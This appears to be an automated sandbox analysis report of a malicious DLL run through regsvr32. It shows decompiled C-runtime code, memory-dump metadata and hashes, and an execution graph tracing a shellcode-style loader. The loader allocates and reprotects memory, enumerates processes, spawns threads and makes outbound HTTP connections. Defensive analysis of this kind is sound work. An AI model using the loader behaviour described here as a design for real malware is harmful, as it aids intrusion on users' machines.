				goto 0xf9d3e90e;
				_a104 = _t218;
				_a64 = _a64 + 1;
				if ((_a80 & 0x00000200) == 0) goto 0xf9d3ea2a;
				if (_a104 == 0) goto 0xf9d3ea0b;
				if ( *_a64 == 0x30) goto 0xf9d3ea2a;
				_a64 = _a64 - 1;
				 *_a64 = 0x30;
				_a104 = _a104 + 1;
				if (_a108 != 0) goto 0xf9d3ec7c;
				if ((_a80 & 0x00000040) == 0) goto 0xf9d3ea9d;
				if ((_a80 & 0x00000100) == 0) goto 0xf9d3ea61;
				_a84 = 0x2d;
				_a92 = 1;
				goto 0xf9d3ea9d;
				if ((_a80 & 0x00000001) == 0) goto 0xf9d3ea80;
				_a84 = 0x2b;
				_a92 = 1;
				goto 0xf9d3ea9d;
				if ((_a80 & 0x00000002) == 0) goto 0xf9d3ea9d;
				_a84 = 0x20;
				_a92 = 1;
				_a1320 = _a88 - _a104 - _a92;
				if ((_a80 & 0x0000000c) != 0) goto 0xf9d3eadf;
				E000007FE7FEF9D3EEC0(0x20, _a1320, _a1536,  &_a1200);
				E000007FE7FEF9D3EF10(_a92, _a64,  &_a84, _a1536,  &_a1200);
				if ((_a80 & 0x00000008) == 0) goto 0xf9d3eb33;
				if ((_a80 & 0x00000004) != 0) goto 0xf9d3eb33;
				E000007FE7FEF9D3EEC0(0x30, _a1320, _a1536,  &_a1200);
				if (_a76 != 0) goto 0xf9d3ec29;
				if (_a104 <= 0) goto 0xf9d3ec29;
				_t354 = _a64;
				_a1328 = _t354;
				_a1336 = _a104;
				_a1336 = _a1336 - 1;
				if (_a1336 <= 0) goto 0xf9d3ec27;
				_t249 = E000007FE7FEF9D26840(_a1336,  &_a120);
				_a1496 = _t354;
				E000007FE7FEF9D26840(_t249,  &_a120);
				_a1340 = E000007FE7FEF9D3F000( &_a1212, _a1328,  *((intOrPtr*)( *_t354 + 0x10c)), _a1496);
				if (_a1340 > 0) goto 0xf9d3ebe7;
				_a1200 = 0xffffffff;
				goto 0xf9d3ec27;
				E000007FE7FEF9D3EE40(_a1212 & 0x0000ffff, _a1536,  &_a1200);
				_a1328 = _a1328 + _a1340;
				goto 0xf9d3eb61;
				goto 0xf9d3ec47;
				E000007FE7FEF9D3EF10(_a104, _a1328 + _a1340, _a64, _a1536,  &_a1200);
				if (_a1200 < 0) goto 0xf9d3ec7c;
				if ((_a80 & 0x00000004) == 0) goto 0xf9d3ec7c;
				E000007FE7FEF9D3EEC0(0x20, _a1320, _a1536,  &_a1200);
				if (_a96 == 0) goto 0xf9d3ec9c;
				0xf9d25330();
				_a96 = 0;
				goto 0xf9d3da75;
				if (_a1216 == 0) goto 0xf9d3ecc2;
				if (_a1216 == 7) goto 0xf9d3ecc2;
				_a1504 = 0;
				goto 0xf9d3eccd;
				_a1504 = 1;
				_t257 = _a1504;
				_a1344 = _t257;
				if (_a1344 != 0) goto 0xf9d3ed13;
				_t359 = L"((state == ST_NORMAL) || (state == ST_TYPE))";
				_a32 = _t359;
				r9d = 0;
				r8d = 0x8f5;
				0xf9d2b3b0();
				if (_t257 != 1) goto 0xf9d3ed13;
				asm("int3");
				if (_a1344 != 0) goto 0xf9d3ed6f;
				0xf9d2ab30();
				 *_t359 = 0x16;
				_a32 = 0;
				r9d = 0x8f5;
				E000007FE7FEF9D2BD70(L"((state == ST_NORMAL) || (state == ST_TYPE))", L"_woutput_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
				_a1376 = 0xffffffff;
				E000007FE7FEF9D26800( &_a120);
				goto 0xf9d3ed8e;
				_a1380 = _a1200;
				E000007FE7FEF9D26800( &_a120);
				return E000007FE7FEF9D23280(_a1380, 2, 2, _a1512 ^ _t389, L"_woutput_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
			}













                                    0x7fef9d3e70c
                                    0x7fef9d3e70c
                                    0x7fef9d3e717
                                    0x7fef9d3e72a
                                    0x7fef9d3e731
                                    0x7fef9d3e740
                                    0x7fef9d3e745
                                    0x7fef9d3e74f
                                    0x7fef9d3e762
                                    0x7fef9d3e768
                                    0x7fef9d3e77b
                                    0x7fef9d3e785
                                    0x7fef9d3e78a
                                    0x7fef9d3e792
                                    0x7fef9d3e7a2
                                    0x7fef9d3e7ac
                                    0x7fef9d3e7b1
                                    0x7fef9d3e7b9
                                    0x7fef9d3e7c7
                                    0x7fef9d3e7d2
                                    0x7fef9d3e7e1
                                    0x7fef9d3e7e5
                                    0x7fef9d3e7ed
                                    0x7fef9d3e7f7
                                    0x7fef9d3e7ff
                                    0x7fef9d3e807
                                    0x7fef9d3e812
                                    0x7fef9d3e81c
                                    0x7fef9d3e823
                                    0x7fef9d3e82b
                                    0x7fef9d3e835
                                    0x7fef9d3e83c
                                    0x7fef9d3e84d
                                    0x7fef9d3e858
                                    0x7fef9d3e865
                                    0x7fef9d3e871
                                    0x7fef9d3e879
                                    0x7fef9d3e87b
                                    0x7fef9d3e883
                                    0x7fef9d3e896
                                    0x7fef9d3e8a3
                                    0x7fef9d3e8b8
                                    0x7fef9d3e8c5
                                    0x7fef9d3e8c7
                                    0x7fef9d3e8cf
                                    0x7fef9d3e8d8
                                    0x7fef9d3e8e4
                                    0x7fef9d3e8e6
                                    0x7fef9d3e8f7
                                    0x7fef9d3e8f9
                                    0x7fef9d3e909
                                    0x7fef9d3e90e
                                    0x7fef9d3e918
                                    0x7fef9d3e91e
                                    0x7fef9d3e929
                                    0x7fef9d3e934
                                    0x7fef9d3e957
                                    0x7fef9d3e963
                                    0x7fef9d3e990
                                    0x7fef9d3e9a2
                                    0x7fef9d3e9a4
                                    0x7fef9d3e9b8
                                    0x7fef9d3e9c2
                                    0x7fef9d3e9c7
                                    0x7fef9d3e9d9
                                    0x7fef9d3e9e5
                                    0x7fef9d3e9f5
                                    0x7fef9d3e9fc
                                    0x7fef9d3ea09
                                    0x7fef9d3ea13
                                    0x7fef9d3ea1d
                                    0x7fef9d3ea26
                                    0x7fef9d3ea2f
                                    0x7fef9d3ea3e
                                    0x7fef9d3ea4b
                                    0x7fef9d3ea52
                                    0x7fef9d3ea57
                                    0x7fef9d3ea5f
                                    0x7fef9d3ea6a
                                    0x7fef9d3ea71
                                    0x7fef9d3ea76
                                    0x7fef9d3ea7e
                                    0x7fef9d3ea89
                                    0x7fef9d3ea90
                                    0x7fef9d3ea95
                                    0x7fef9d3eaad
                                    0x7fef9d3eabd
                                    0x7fef9d3eada
                                    0x7fef9d3eaf8
                                    0x7fef9d3eb06
                                    0x7fef9d3eb11
                                    0x7fef9d3eb2e
                                    0x7fef9d3eb38
                                    0x7fef9d3eb43
                                    0x7fef9d3eb49
                                    0x7fef9d3eb4e
                                    0x7fef9d3eb5a
                                    0x7fef9d3eb71
                                    0x7fef9d3eb7a
                                    0x7fef9d3eb85
                                    0x7fef9d3eb8a
                                    0x7fef9d3eb97
                                    0x7fef9d3ebc9
                                    0x7fef9d3ebd8
                                    0x7fef9d3ebda
                                    0x7fef9d3ebe5
                                    0x7fef9d3ebff
                                    0x7fef9d3ec1a
                                    0x7fef9d3ec22
                                    0x7fef9d3ec27
                                    0x7fef9d3ec42
                                    0x7fef9d3ec4f
                                    0x7fef9d3ec5a
                                    0x7fef9d3ec77
                                    0x7fef9d3ec82
                                    0x7fef9d3ec8e
                                    0x7fef9d3ec93
                                    0x7fef9d3ec9c
                                    0x7fef9d3eca9
                                    0x7fef9d3ecb3
                                    0x7fef9d3ecb5
                                    0x7fef9d3ecc0
                                    0x7fef9d3ecc2
                                    0x7fef9d3eccd
                                    0x7fef9d3ecd4
                                    0x7fef9d3ece3
                                    0x7fef9d3ece5
                                    0x7fef9d3ecec
                                    0x7fef9d3ecf1
                                    0x7fef9d3ecf4
                                    0x7fef9d3ed06
                                    0x7fef9d3ed0e
                                    0x7fef9d3ed10
                                    0x7fef9d3ed1b
                                    0x7fef9d3ed1d
                                    0x7fef9d3ed22
                                    0x7fef9d3ed28
                                    0x7fef9d3ed31
                                    0x7fef9d3ed4c
                                    0x7fef9d3ed51
                                    0x7fef9d3ed61
                                    0x7fef9d3ed6d
                                    0x7fef9d3ed76
                                    0x7fef9d3ed82
                                    0x7fef9d3eda5

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: get_int64_arg
                                    • String ID: '$9
                                    • API String ID: 1967237116-1823400153
                                    • Opcode ID: 96444a5ecc25f07181ec4491dd73a0df774b8fd8e649fad80ce219d3ce06daa6
                                    • Instruction ID: 29668378713c93b892a0041d725b85e979c1ad93fe9cb8202607dd12c91b0faa
                                    • Opcode Fuzzy Hash: 96444a5ecc25f07181ec4491dd73a0df774b8fd8e649fad80ce219d3ce06daa6
                                    • Instruction Fuzzy Hash: 0241C33660DA858AE7A18B19E8407AFB3E4F7C5752F100125E6D8C6AE8EBBDD4408F14
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D3D710 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: _unlock
                                    • String ID: _BLOCK_TYPE_IS_VALID(pHead->nBlockUse)$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgdel.cpp
                                    • API String ID: 2480363372-1749241151
                                    • Opcode ID: 69826465c09442dd62c721ef0480ef2ecfb8ed15fa83514cc39f9f882c8ed808
                                    • Instruction ID: 19170a7b4d801314c698f141b2cab39615b7a96e1dab02ace679e734dc17c016
                                    • Opcode Fuzzy Hash: 69826465c09442dd62c721ef0480ef2ecfb8ed15fa83514cc39f9f882c8ed808
                                    • Instruction Fuzzy Hash: BD113D7AA2868686EBE49B94D841B6D63E1F781795F605036E68E43BA4CB3DE404CB01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D41200 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: DestroyedExceptionFindFrameObjectUnlink
                                    • String ID: csm
                                    • API String ID: 1826589669-1018135373
                                    • Opcode ID: 34ffa76e03f6f125ffde0022bc26c820041218dfec633c9b0636301340e9056d
                                    • Instruction ID: 9f3dc625307ec028be1fda2cc305f99b8c00c3b4febe2b6a2618c0b56fcdacc0
                                    • Opcode Fuzzy Hash: 34ffa76e03f6f125ffde0022bc26c820041218dfec633c9b0636301340e9056d
                                    • Instruction Fuzzy Hash: 61114232944681CADFA0DF79C8812BD27E4F795B88F615135EA5D877B1CB26D981C300
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D2F3E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: _free_nolock
                                    • String ID: ("Corrupted pointer passed to _freea", 0)$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\malloc.h
                                    • API String ID: 2882679554-3458198949
                                    • Opcode ID: 9de8216f17933041b20e0427cd6b955395f4fe92a776214bf069d9d6f9ded054
                                    • Instruction ID: ad827b7ac8ab2a7eb82804d35ce3812f3a61bc9df3b9012bdfb51b84df9589d9
                                    • Opcode Fuzzy Hash: 9de8216f17933041b20e0427cd6b955395f4fe92a776214bf069d9d6f9ded054
                                    • Instruction Fuzzy Hash: D6014431A1C78286EBD09B6AE88472EB3D0F390350F604535E6CD43FA8DBBED4058B01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Execution Graph

                                    Execution Coverage:17.1%
                                    Dynamic/Decrypted Code Coverage:100%
                                    Signature Coverage:4.4%
                                    Total number of Nodes:90
                                    Total number of Limit Nodes:12
                                    execution_graph 4111 1800010e8 4114 18001dbfc 4111->4114 4113 180001151 4121 18001dc49 4114->4121 4119 18001f7d8 4119->4113 4121->4119 4122 180014930 4121->4122 4126 1800054d8 4121->4126 4130 18000ebac 4121->4130 4134 18000e278 4121->4134 4138 1800171b8 4121->4138 4123 180014953 4122->4123 4124 180014a3a 4123->4124 4146 180023748 4123->4146 4124->4121 4129 18000552d 4126->4129 4128 180005e53 4128->4121 4129->4128 4157 18002b368 4129->4157 4131 18000ebf9 4130->4131 4133 18000ec33 4131->4133 4168 18002627c 4131->4168 4133->4121 4136 18000e29a 4134->4136 4137 18000e4bb 4136->4137 4175 180025b1c 4136->4175 4137->4121 4139 1800171da 4138->4139 4144 18001752f 4139->4144 4178 18000d12c 4139->4178 4182 180005e7c 4139->4182 4186 180019af0 4139->4186 4190 180011904 4139->4190 4194 180014aa4 4139->4194 4144->4121 4147 18002376e 4146->4147 4149 18002381b 4147->4149 4150 18000f2dc 4147->4150 4149->4124 4152 18000f3b8 4150->4152 4151 18000f59a 4151->4149 4152->4151 4154 18002a3e0 4152->4154 4156 18002a46c 4154->4156 4155 18002a531 GetVolumeInformationW 4155->4151 4156->4155 4158 18002b3f5 4157->4158 4159 18002ba3a 4158->4159 4162 1800155e0 4158->4162 4165 180008e80 4158->4165 4159->4129 4163 180015677 4162->4163 4164 180015725 InternetConnectW 4163->4164 4164->4158 4166 180008ef7 4165->4166 4167 180008fac HttpOpenRequestW 4166->4167 4167->4158 4171 180029710 4168->4171 4173 18002974b 4171->4173 4172 180029a74 Process32NextW 4172->4173 4173->4172 4174 18002633d 4173->4174 4174->4131 4176 180025b7f 4175->4176 4177 180025c05 CreateThread 4176->4177 4177->4136 4180 18000d176 4178->4180 4179 18000db07 4179->4139 4180->4179 4198 18001d128 4180->4198 4184 180005eb1 4182->4184 4183 1800064ba 4183->4139 4184->4183 4185 18001d128 CreateFileW 4184->4185 4185->4184 4188 180019b56 4186->4188 4187 18001aa27 4187->4139 4188->4187 4189 18001d128 CreateFileW 4188->4189 4189->4188 4192 180011930 4190->4192 4191 180025b1c CreateThread 4191->4192 4192->4191 4193 180011967 4192->4193 4193->4139 4196 180014ad9 4194->4196 4195 180025b1c CreateThread 4195->4196 4196->4195 4197 180014b10 4196->4197 4197->4139 4199 18001d160 4198->4199 4201 18001d46f 4199->4201 4202 180010b1c 4199->4202 4201->4180 4204 180010ba2 4202->4204 4203 180010c4a CreateFileW 4203->4199 4204->4203 4205 180025b1c 4206 180025b7f 4205->4206 4207 180025c05 CreateThread 4206->4207 4220 18002490c 4221 18002496d 4220->4221 4222 180025329 4221->4222 4223 180010b1c CreateFileW 4221->4223 4223->4221 4208 180010b1c 4210 180010ba2 4208->4210 4209 180010c4a CreateFileW 4210->4209 4211 3b0000 4212 3b0183 4211->4212 4213 3b043e VirtualAlloc 4212->4213 4216 3b0462 4213->4216 4214 3b0531 GetNativeSystemInfo 4215 3b056d VirtualAlloc 4214->4215 4217 3b0a00 4214->4217 4218 3b058b 4215->4218 4216->4214 4216->4217 4218->4217 4219 3b09d9 VirtualProtect 4218->4219 4219->4218

                                    Executed Functions

                                    Function 003B0000 Relevance: 74.6, APIs: 4, Strings: 38, Instructions: 1094memoryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 0 3b0000-3b0460 call 3b0aa8 * 2 VirtualAlloc 22 3b048a-3b0494 0->22 23 3b0462-3b0466 0->23 26 3b049a-3b049e 22->26 27 3b0a91-3b0aa6 22->27 24 3b0468-3b0488 23->24 24->22 24->24 26->27 28 3b04a4-3b04a8 26->28 28->27 29 3b04ae-3b04b2 28->29 29->27 30 3b04b8-3b04bf 29->30 30->27 31 3b04c5-3b04d2 30->31 31->27 32 3b04d8-3b04e1 31->32 32->27 33 3b04e7-3b04f4 32->33 33->27 34 3b04fa-3b0507 33->34 35 3b0509-3b0511 34->35 36 3b0531-3b0567 GetNativeSystemInfo 34->36 37 3b0513-3b0518 35->37 36->27 38 3b056d-3b0589 VirtualAlloc 36->38 39 3b051a-3b051f 37->39 40 3b0521 37->40 41 3b058b-3b059e 38->41 42 3b05a0-3b05ac 38->42 43 3b0523-3b052f 39->43 40->43 41->42 44 3b05af-3b05b2 42->44 43->36 43->37 46 3b05c1-3b05db 44->46 47 3b05b4-3b05bf 44->47 48 3b061b-3b0622 46->48 49 3b05dd-3b05e2 46->49 47->44 50 3b06db-3b06e2 48->50 51 3b0628-3b062f 48->51 52 3b05e4-3b05ea 49->52 54 3b06e8-3b06f9 50->54 55 3b0864-3b086b 50->55 51->50 53 3b0635-3b0642 51->53 56 3b060b-3b0619 52->56 57 3b05ec-3b0609 52->57 53->50 60 3b0648-3b064f 53->60 61 3b0702-3b0705 54->61 58 3b0871-3b087f 55->58 59 3b0917-3b0929 55->59 56->48 56->52 57->56 57->57 64 3b090e-3b0911 58->64 62 3b092f-3b0937 59->62 63 3b0a07-3b0a1a 59->63 65 3b0654-3b0658 60->65 66 3b06fb-3b06ff 61->66 67 3b0707-3b070a 61->67 69 3b093b-3b093f 62->69 88 3b0a1c-3b0a27 63->88 89 3b0a40-3b0a4a 63->89 64->59 68 3b0884-3b08a9 64->68 70 3b06c0-3b06ca 65->70 66->61 71 3b0788-3b078e 67->71 72 3b070c-3b071d 67->72 94 3b08ab-3b08b1 68->94 95 3b0907-3b090c 68->95 75 3b09ec-3b09fa 69->75 76 3b0945-3b095a 69->76 73 3b065a-3b0669 70->73 74 3b06cc-3b06d2 70->74 78 3b0794-3b07a2 71->78 77 3b071f-3b0720 72->77 72->78 84 3b066b-3b0678 73->84 85 3b067a-3b067e 73->85 74->65 80 3b06d4-3b06d5 74->80 75->69 86 3b0a00-3b0a01 75->86 82 3b097b-3b097d 76->82 83 3b095c-3b095e 76->83 87 3b0722-3b0784 77->87 90 3b07a8 78->90 91 3b085d-3b085e 78->91 80->50 99 3b097f-3b0981 82->99 100 3b09a2-3b09a4 82->100 96 3b096e-3b0979 83->96 97 3b0960-3b096c 83->97 98 3b06bd-3b06be 84->98 101 3b068c-3b0690 85->101 102 3b0680-3b068a 85->102 86->63 87->87 103 3b0786 87->103 104 3b0a38-3b0a3e 88->104 92 3b0a7b-3b0a8e 89->92 93 3b0a4c-3b0a54 89->93 105 3b07ae-3b07d4 90->105 91->55 92->27 93->92 111 3b0a56-3b0a78 93->111 108 3b08bb-3b08c8 94->108 109 3b08b3-3b08b9 94->109 95->64 112 3b09be-3b09bf 96->112 97->112 98->70 113 3b0989-3b098b 99->113 114 3b0983-3b0987 99->114 106 3b09ac-3b09bb 100->106 107 3b09a6-3b09aa 100->107 116 3b0692-3b06a3 101->116 117 3b06a5-3b06a9 101->117 115 3b06b6-3b06ba 102->115 103->78 104->89 110 3b0a29-3b0a35 104->110 129 3b07d6-3b07d9 105->129 130 3b0835-3b0839 105->130 106->112 107->112 120 3b08ca-3b08d1 108->120 121 3b08d3-3b08e5 108->121 119 3b08ea-3b08fe 109->119 110->104 111->92 118 3b09c5-3b09cb 112->118 113->100 124 3b098d-3b098f 113->124 114->112 115->98 116->115 117->98 125 3b06ab-3b06b3 117->125 126 3b09d9-3b09e9 VirtualProtect 118->126 127 3b09cd-3b09d3 118->127 119->95 138 3b0900-3b0905 119->138 120->120 120->121 121->119 131 3b0999-3b09a0 124->131 132 3b0991-3b0997 124->132 125->115 126->75 127->126 134 3b07db-3b07e1 129->134 135 3b07e3-3b07f0 129->135 136 3b083b 130->136 137 3b0844-3b0850 130->137 131->118 132->112 139 3b0812-3b082c 134->139 140 3b07fb-3b080d 135->140 141 3b07f2-3b07f9 135->141 136->137 137->105 142 3b0856-3b0857 137->142 138->94 139->130 144 3b082e-3b0833 139->144 140->139 141->140 141->141 142->91 144->129
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.1214636065.00000000003B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_3b0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Virtual$Alloc$InfoNativeProtectSystem
                                    • String ID: Cach$Find$Flus$Free$GetN$Libr$Load$Load$Lock$Reso$Reso$Reso$Reso$RtlA$Size$Slee$Virt$Virt$aryA$ativ$ddFu$eSys$hIns$lloc$ncti$ofRe$onTa$rote$sour$temI$tion$truc$ualA$ualP$urce$urce$urce$urce
                                    • API String ID: 2313188843-2517549848
                                    • Opcode ID: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                    • Instruction ID: 9afc1e300d741774a680026ef55b814baa8c9bc1b53663ca5f48fe88e5bb128d
                                    • Opcode Fuzzy Hash: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                    • Instruction Fuzzy Hash: 6A72C430618B488BDB2DDF18C8856FAB7E1FB98305F10462EE9CAD7611DB34D946CB85
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000000018000BEF0 Relevance: 5.4, Strings: 4, Instructions: 360COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.1215293806.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: &$5RX$WE0$\h]
                                    • API String ID: 0-3485045178
                                    • Opcode ID: 03a43095a46f3f61d774493bb922c9041777d8e7f6728b8083ed9e1489c990f2
                                    • Instruction ID: bcdd786ba30a02497e69aa8425991a4f00e6ab9cdb2a577162cf86c9936701da
                                    • Opcode Fuzzy Hash: 03a43095a46f3f61d774493bb922c9041777d8e7f6728b8083ed9e1489c990f2
                                    • Instruction Fuzzy Hash: 4502E4705187C88BD794DFA8C48A69FFBE1FB94744F104A1DF486862A0DBF4D949CB42
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0000000180017C8C Relevance: 4.0, Strings: 3, Instructions: 298COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 672 180017c8c-180017cca 673 180017ccf-180017cd4 672->673 674 180017cda-180017cdf 673->674 675 180017f5b-180017fc3 call 180025c30 673->675 676 180017f51-180017f56 674->676 677 180017ce5-180017cea 674->677 683 180017fc5-180017fca 675->683 684 180017fcf-180017fd3 675->684 676->673 679 180017fd8-180017fdd 677->679 680 180017cf0-180017d7f call 18001bd40 677->680 679->673 685 180017fe3-180017fe6 679->685 686 180017d84-180017d89 680->686 687 180017f43-180017f4c 683->687 684->679 688 180017fec-1800180ab call 180011ccc 685->688 689 1800180ad-1800180b4 685->689 686->688 690 180017d8f-180017d94 686->690 687->673 692 1800180b7-1800180d1 688->692 689->692 690->685 693 180017d9a-180017d9f 690->693 693->687 695 180017da5-180017e0e call 180025c30 693->695 695->685 698 180017e14-180017f3d call 180024360 call 180011ccc 695->698 698->685 698->687
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.1215293806.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 47T]$K_j$is[
                                    • API String ID: 0-2699472077
                                    • Opcode ID: f40290fddc4da9899e50fb62f60591b1b1e6ff44cb1495cdff8c692982a81ea2
                                    • Instruction ID: 6016c1221021197edd7f817fb9cbd09fcb5ac8bbf6c5f54f5697c1ffe249b4d0
                                    • Opcode Fuzzy Hash: f40290fddc4da9899e50fb62f60591b1b1e6ff44cb1495cdff8c692982a81ea2
                                    • Instruction Fuzzy Hash: 2CD127719047CD8FCF99CFA8C88A6EE7BB1FB48344F50821DE80697651C7B4990ACB85
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0000000180029710 Relevance: 4.0, Strings: 3, Instructions: 232COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 703 180029710-180029777 call 1800153f4 706 18002977c-18002977e 703->706 707 180029784-180029789 706->707 708 180029a79-180029b31 call 180028300 706->708 709 18002978f-180029794 707->709 710 1800299b0-180029a6f call 180015408 707->710 715 180029b36 708->715 712 1800298d8-18002999d call 1800066c8 709->712 713 18002979a-18002979f 709->713 718 180029a74 Process32NextW 710->718 721 1800299a2-1800299a6 712->721 716 1800297a1-1800297a6 713->716 717 1800297d9-1800298bc call 18000b3b4 713->717 719 180029b3b-180029b40 715->719 722 1800297a8-1800297ad 716->722 723 1800297be-1800297d7 call 18000a248 716->723 728 1800298c1-1800298c8 717->728 718->708 719->706 724 180029b46-180029b5e 719->724 721->710 722->719 726 1800297b3-1800297bc 722->726 723->706 726->706 728->724 730 1800298ce-1800298d3 728->730 730->706
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.1215293806.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: $g$>6$nB
                                    • API String ID: 0-1868063892
                                    • Opcode ID: 8b852edfb9a28c8a6125e1cd608d8a75501181fe9d205967e4ddb9cdded4da80
                                    • Instruction ID: 5ef365e91c1d80a07604eb41db5a1b86f6ebf61e3d7968a3749ade557fb4125b
                                    • Opcode Fuzzy Hash: 8b852edfb9a28c8a6125e1cd608d8a75501181fe9d205967e4ddb9cdded4da80
                                    • Instruction Fuzzy Hash: 7CB121705193849FC7A9CF68C58569EBBF0FB88744F906A1DF8868B260D7B4DA44CF42
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00000001800155E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 98networkCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 599 1800155e0-18001569d call 1800153f4 602 1800156a3-18001571f call 18001c224 599->602 603 180015725-180015765 InternetConnectW 599->603 602->603
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.1215293806.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ConnectInternet
                                    • String ID: /w?$pYi
                                    • API String ID: 3050416762-3829454487
                                    • Opcode ID: 33421f65957b2cee526031f8a07a804c17c2d95f214975574550df922f90e764
                                    • Instruction ID: 9ccfc4099f9371cda73c12f66118d6bd88d16b35f011f4316eea9315b8229921
                                    • Opcode Fuzzy Hash: 33421f65957b2cee526031f8a07a804c17c2d95f214975574550df922f90e764
